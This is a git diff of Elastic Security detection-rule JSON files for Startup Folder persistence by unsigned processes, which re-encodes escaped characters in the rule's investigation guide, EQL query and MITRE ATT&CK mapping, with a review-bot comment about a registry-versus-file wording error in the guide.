Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. 
Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.code_signature.trusted == false and\n /* suspicious paths can be added here */\n process.executable : (\"C:\\\\Users\\\\*.exe\",\n \"C:\\\\ProgramData\\\\*.exe\",\n \"C:\\\\Windows\\\\Temp\\\\*.exe\",\n \"C:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"C:\\\\Intel\\\\*.exe\",\n \"C:\\\\PerfLogs\\\\*.exe\")\n ]\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n ]\n", "related_integrations": [ { @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_105.json b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_105.json index 94ae73e7b95..63698967e34 100644 --- a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_105.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Folder Persistence via Unsigned Process", - "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. 
Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. 
Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by host.id, process.entity_id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.code_signature.trusted == false and\n /* suspicious paths can be added here */\n process.executable : (\"C:\\\\Users\\\\*.exe\",\n \"C:\\\\ProgramData\\\\*.exe\",\n \"C:\\\\Windows\\\\Temp\\\\*.exe\",\n \"C:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"C:\\\\Intel\\\\*.exe\",\n \"C:\\\\PerfLogs\\\\*.exe\")\n ]\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n ]\n",
 "related_integrations": [
 {
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_106.json b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_106.json
index 4d3d29f08b6..9d96faf3e82 100644
--- a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_106.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Folder Persistence via Unsigned Process", - "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. 
Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. 
Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by host.id, process.entity_id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.code_signature.trusted == false and\n /* suspicious paths can be added here */\n process.executable : (\"C:\\\\Users\\\\*.exe\",\n \"C:\\\\ProgramData\\\\*.exe\",\n \"C:\\\\Windows\\\\Temp\\\\*.exe\",\n \"C:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"C:\\\\Intel\\\\*.exe\",\n \"C:\\\\PerfLogs\\\\*.exe\")\n ]\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n ]\n",
 "related_integrations": [
 {
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_107.json b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_107.json
index 261708878cb..8fb15fcba2f 100644
--- a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_107.json
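Review bot: The "Investigate potentially compromised accounts" step in the new `note` tells analysts to look for 4624 logon events "after the registry modification", but this rule fires on file writes to the Startup folder (the `file.path` clause of `query`), not on a registry change, so the sentence reads as copied from a registry-persistence guide and will send responders to the wrong pivot. Suggested wording: `- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the file was written to the Startup folder.` The commit itself only re-encodes `\u003e` as `>` in this string, so the defect predates it; the same text appears in the _107 and _108 versions in later hunks and is presumably inherited from the upstream rule source, which is where it should be corrected rather than by hand-editing these exported JSON files.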
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Folder Persistence via Unsigned Process", - "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. 
Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### 